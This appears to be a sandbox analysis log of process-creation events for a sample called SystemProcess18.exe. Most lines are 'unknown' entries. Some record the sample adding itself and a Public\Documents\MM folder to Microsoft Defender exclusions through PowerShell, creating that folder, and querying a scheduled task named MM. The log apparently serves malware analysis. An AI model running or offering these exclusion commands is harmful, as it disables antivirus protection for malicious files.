Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
